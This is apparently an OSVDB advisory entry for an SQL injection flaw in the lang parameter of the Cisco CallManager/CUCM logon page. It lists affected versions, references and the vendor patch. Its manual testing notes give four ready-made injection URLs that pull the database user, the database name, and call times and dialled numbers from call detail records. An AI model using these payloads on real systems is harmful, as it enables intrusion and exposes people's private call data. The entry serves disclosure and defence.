36659 : Cisco CallManager / CUCM Logon Page lang Variable SQL Injection
Printer | http://osvdb.org/36659 | Email This | Edit Vulnerability

Views This Week

Views All Time

Info

Last Modified

6 months ago

Percent Complete

100%

Disclosure

Aug 30, 2007

Discovery

Unknown

Dates

Exploit

Unknown

Solution

Unknown

Description

Cisco CallManager/Unified Communications Manager contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the logon page not properly sanitizing user-supplied input to the lang variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Classification

Location: Remote/Network Access Required
Attack Type: Information Disclosure, Input Manipulation
Impact: Loss of Confidentiality, Loss of Integrity
Exploit: Exploit Available
Disclosure: OSVDB Verified
OSVDB: Web Related

Solution

Cisco has released a patch to address this issue. Additionally, it is possible to correct the flaw by implementing the following workaround(s): enable the CallManager URLScan ISAPI filter.

Products

Cisco Systems, Inc.	CallManager	3.3(5)sr2b
		4.1(3)sr5
		4.2(3)sr2
		4.3(1)sr1
	Unified Communications Manager	3.3(5)sr2b
		4.1(3)sr5
		4.2(3)sr2
		4.3(1)sr1

References

FrSIRT Advisory: ADV-2007-3010
Bugtraq ID: 25480
Related OSVDB ID: 36658
ISS X-Force ID: 36326
Vendor Specific Advisory URL: http://www.cisco.com/en/US/products/products_security_advisory09186a00808ae327.sh ......
Secunia Advisory ID: 26641
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0477.html
CVE ID: 2007-4634 (see also: NVD)
Security Tracker: 1018624
Keyword: CSCsi64265

Manual Testing Notes

To see the returned data from these exploit URLs, view the source of 
the returned page and look for a line like this:

The string "123" is the value returned from the database.

Examples:

Display the logged-in database user:

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the selected database:

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the UNIX time at which a call was made from extension 12345:

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Display the destination number for that call. Replace "1174900000" with 
the value from the previous query:

https://0.0.0.0/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

Credit

Elliot Kendall - ekendallbrandeis.edu - Brandeis University

Blogs

Provided by Technorati

None found at this time

Comments

Add Comment Hide Add Comment

No Comments.

DONATE NOW!

User Status

Account
- Login
- Sign-Up

Quick Searches

Views This Week

Views All Time

Info

Last Modified

Percent Complete

Disclosure

Discovery

Dates

Exploit

Solution

Description

Classification

Solution

Products

Cisco Systems, Inc.

CallManager

Unified Communications Manager

References

Manual Testing Notes

Credit

Blogs

Comments